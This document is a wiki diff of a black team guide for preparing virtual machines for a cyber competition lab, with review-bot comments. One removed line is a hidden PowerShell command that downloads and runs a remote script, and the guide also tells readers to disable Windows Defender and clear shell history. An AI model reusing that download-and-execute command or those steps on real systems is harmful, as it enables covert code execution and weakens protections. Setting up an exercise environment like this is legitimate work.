guides:lockdown_black_team

guides:lockdown_black_team [2019/12/19 04:44]
aibekzhy Swappiness
guides:lockdown_black_team [2020/06/08 05:49] (current)
aibekzhy
Line 18: Line 18:
     - Copy Paste Enabled     - Copy Paste Enabled
     - Graphics to support Full HD/​Automatic Graphics Detection     - Graphics to support Full HD/​Automatic Graphics Detection
 +    - Ensure time Synchronized
 +    - Potentially disable DHCP
 +    - Make sure the best NIC type is attached "​vmxnet3"​ -> "​vmxnet2"​ -> etc
  
   * Linux:   * Linux:
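Review bot: "Potentially disable DHCP" (third added item) does not say where it applies, on the template's own NIC, on the pfSense segment, or both, and a VM that silently loses a lease mid-competition looks like deliberate damage to the blue team. State the intended outcome (for example static addressing consistent with the Naming Conventions section below) and whether the DHCP server or only the client is meant. "Ensure time Synchronized" should name the mechanism (host time sync via VMware Tools or an NTP source reachable inside the lab), since clock skew breaks Windows domain authentication and makes log timelines impossible to correlate across the VMs. The NIC order "vmxnet3 -> vmxnet2 -> etc" reads as a fallback chain; add a sentence on when the fallback is actually needed so nobody downgrades a working vmxnet3 template.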
Line 24: Line 27:
     - SSH server (installed, enabled, running)     - SSH server (installed, enabled, running)
     - Decrease swappiness to 10     - Decrease swappiness to 10
-    - Ubuntu specific:+    ​- Python2 and python3 installed (less headache if you are using ansible) 
 +    ​- Ubuntu-specific:
       - Ensure networkd is a renderer       - Ensure networkd is a renderer
 +      - Install resolvconf to configure DNS on 18.*
     - Fedora specific:     - Fedora specific:
       - Depending on implementation look into installing network-scripts       - Depending on implementation look into installing network-scripts
       - Install libselinux-python       - Install libselinux-python
     - Ensure Release of child OSes match supported OS: https://​kb.vmware.com/​s/​article/​1005870     - Ensure Release of child OSes match supported OS: https://​kb.vmware.com/​s/​article/​1005870
 +
 +
   * Windows:   * Windows:
     - VMWare tools     - VMWare tools
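Review bot: "Install resolvconf to configure DNS on 18.*" gives no reason and sits directly under "Ensure networkd is a renderer", so a reader cannot tell whether the two items are alternatives or both required; add one clause on what failed without it (which component was rewriting /etc/resolv.conf) so the next black team can judge whether the step still applies. The new "Python2 and python3 installed (less headache if you are using ansible)" item should say which playbooks actually need the Python 2 interpreter; installing both interpreters on every template is one more thing the blue teams have to account for. The two blank lines added before "* Windows:" are a stray whitespace change.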
Line 37: Line 44:
     - Ensure that Windows Remote Management service is started Automatically     - Ensure that Windows Remote Management service is started Automatically
     - Enable Ping via Firewall (Allow ICMP Packets)     - Enable Ping via Firewall (Allow ICMP Packets)
-    - Disable Windows Defender (Registry/​GPO)+    - Disable/​Uninstall ​Windows Defender (Registry/​GPO)
     - Disable Windows Updates (Registry/​GPO/​Services)     - Disable Windows Updates (Registry/​GPO/​Services)
     - Ensure Sleep is disabled     - Ensure Sleep is disabled
-    - Try to Debloat as much as possible: https://​github.com/​Sycnex/​Windows10Debloater+    - Try to Debloat as much as possible: https://​github.com/​Sycnex/​Windows10Debloater ​(Might not worth it) 
 +    - Sometimes windows may start randomly shutting down. In which case please look into the following 
 +    - Use High-performance Battery Profile 
 +    - Windows 10 Enterprise specific: 
 +      - Make sure when Template is deployed, it has an Ethernet Access. If it doesn'​t have one, it will reboot endlessly: https://​superuser.com/​questions/​933754/​why-does-windows-10-shut-down-hourly-with-initiated-power-off-on-behalf-of-nt-a  
  
   * Pfsense:   * Pfsense:
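Review bot: The structure of the new Windows items is ambiguous: "Sometimes windows may start randomly shutting down. In which case please look into the following" is followed by "Use High-performance Battery Profile" and the "Windows 10 Enterprise specific" block at the same indent level, so it is unclear whether those are the things to look into or independent tasks. Nest the remediation items one level under that sentence and end it with a colon, and change "(Might not worth it)" to "(might not be worth it)". For "Disable/Uninstall Windows Defender (Registry/GPO)", say which of the two is intended for which edition, because a registry/GPO disable and a removal leave the machine in different states when a blue team later tries to turn protection back on, and that difference affects scoring fairness.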
Line 51: Line 63:
   * Ensure you clean up the history of all applications/​shells   * Ensure you clean up the history of all applications/​shells
   * Ensure you take a snapshot of the entire infrastructure after deploying your malware   * Ensure you take a snapshot of the entire infrastructure after deploying your malware
 +  * Manually login to every VM after the red team is done pre-staging. This ensures that everything is still operational,​ and in addition, it loads a lot of things from disk to memory, which ensures a smoother experience at the start of the competition. ​
 +  * If the performance of VMs is very slow, try to lower the number of snapshots or use the snapshots that were created are no longer than a day before the competition.
  
  
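Review bot: The last added sentence is garbled: "or use the snapshots that were created are no longer than a day before the competition" should read "or revert to snapshots taken no more than a day before the competition". In the item above it, "Manually login" should be "Manually log in", and the trailing space after "competition." should go. The rationale in that item (warming the disk cache by touching every VM) is worth keeping; consider also noting that this login pass is the last chance to verify the snapshot taken after malware deployment actually boots, since the earlier bullet only says to take the snapshot.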
Line 66: Line 80:
  
 Things that are typically requested: Things that are typically requested:
-  * Windows: Dotnet ​(powershell.exe -Sta -Nop -w hidden -Command "​IEX(IWR 'https://raw.githubusercontent.com/NotoriousRebel/​temppp/​master/​builder.ps1?​token=AIVA5C62REQKCZAXPVLPOUS5TAWXC'​ -UseBasicParsing)"​)+  * Windows: ​ 
 +    * Dotnet https://dotnet.microsoft.com/download 
 +    * Python executables
   * C2 Servers   * C2 Servers
 +  * 
 ===== Naming Conventions ===== ===== Naming Conventions =====
  
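Review bot: Dropping the Windows one-liner that fetched builder.ps1 from raw.githubusercontent.com is the right call, but the `?token=` query parameter it carried remains readable in this revision's history, so that token must be treated as exposed and revoked rather than relying on the edit to hide it; the same applies to any other wiki revision that pasted it. The replacement list also leaves an empty "* " bullet after "C2 Servers"; either fill it in or remove it.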
Line 103: Line 120:
  
 **Note: %02d just represents a padded 0.** **Note: %02d just represents a padded 0.**
 +
 +Aibek to Aibek: PLEASE FIX ANSIBLE RELATIVE PATHING
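Review bot: "Aibek to Aibek: PLEASE FIX ANSIBLE RELATIVE PATHING" is a personal reminder in the published guide body; either turn it into an actionable item (which playbook or role, and which paths are resolved relative to the checkout rather than the role directory) or track it outside the page so readers do not mistake it for a step.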
  • guides/lockdown_black_team.1576730671.txt.gz
  • Last modified: 2019/12/19 04:44
  • by aibekzhy